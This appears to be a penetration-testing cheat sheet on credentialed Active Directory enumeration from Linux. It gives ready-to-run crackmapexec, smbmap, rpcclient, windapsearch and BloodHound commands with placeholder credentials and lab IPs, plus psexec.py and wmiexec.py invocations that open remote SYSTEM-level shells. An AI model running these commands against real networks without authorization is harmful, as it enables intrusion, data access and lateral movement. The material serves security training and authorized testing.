Credentialed Enumeration From Linux
Last updated
Was this helpful?
Last updated
Was this helpful?
sudo crackmapexec smb 10.20.30.40 -u alex -p StrongPass123 --users
→ Enumerates domain users
Displays a list of domain users along with the badPwdCount
attribute.
sudo crackmapexec smb 10.20.30.40 -u alex -p StrongPass123 --groups
→ Enumerates domain groups
Provides a list of groups along with the number of users in each.
sudo crackmapexec smb 10.20.30.150 -u alex -p StrongPass123 --loggedon-users
→ Shows currently logged-in users.
sudo crackmapexec smb 10.20.30.40 -u alex -p StrongPass123 --shares
→ Lists available shared resources and access levels for the user.
sudo crackmapexec smb 10.20.30.40 -u alex -p StrongPass123 -M spider_plus
This module scans all accessible shares for readable files. You can specify a particular share using --share 'Finance Records'
.
The output is saved in /tmp/cme_spider_plus/<target_ip>
.
smbmap -u alex -p StrongPass123 -d CORP.LOCAL -H 10.20.30.40
→ Checks accessible resources and permission levels.
smbmap -u alex -p StrongPass123 -d CORP.LOCAL -H 10.20.30.40 -R 'Finance Records' --dir-only
Displays all subdirectories within the specified directory without listing files.
is a useful tool for interacting with Samba and MS-RPC services. It allows enumeration, modification, and deletion of Active Directory objects.
rpcclient -U "" -N 10.20.30.40
→ Establishes a null session shell with the domain controller.
rpcclient$> queryuser 0x457
→ Enumerates user by RID (0x457 in hex = 111 in decimal).
rpcclient$> enumdomusers
→ Lists all domain users along with their RIDs.
This tool uploads an executable to the ADMIN$
share, creates a remote service, and establishes a SYSTEM-level shell.
psexec.py corp.local/jdoe:'SecurePass!1'@10.20.30.125
→ Spawns a remote shell.
wmiexec.py
leverages Windows Management Instrumentation (WMI) for command execution. Unlike psexec.py
, it does not leave artifacts on the target system.
wmiexec.py corp.local/jdoe:'SecurePass!1'@10.20.30.40
→ Opens a semi-interactive shell.
python3 windapsearch.py --dc-ip 10.20.30.40 -u alex@corp.local -p StrongPass123 --da
→ Retrieves members of the Domain Admins group.
python3 windapsearch.py --dc-ip 10.20.30.40 -u alex@corp.local -p StrongPass123 -PU
→ Identifies privileged users.
Initially a PowerShell tool, BloodHound.py
is a Python implementation useful for gathering AD-related data without needing a Windows machine.
sudo bloodhound-python -u 'alex' -p 'StrongPass123' -ns 10.20.30.40 -d corp.local -c all
→ Runs BloodHound data collection.
-ns
= Name server
-d
= Domain
-c
= Collection type (all data in this case)
The output consists of JSON files.
zip -r corp_bh.zip *.json
→ Compresses collected data into a ZIP file.
is a Python script for querying LDAP and extracting user, group, and computer information from an Active Directory domain.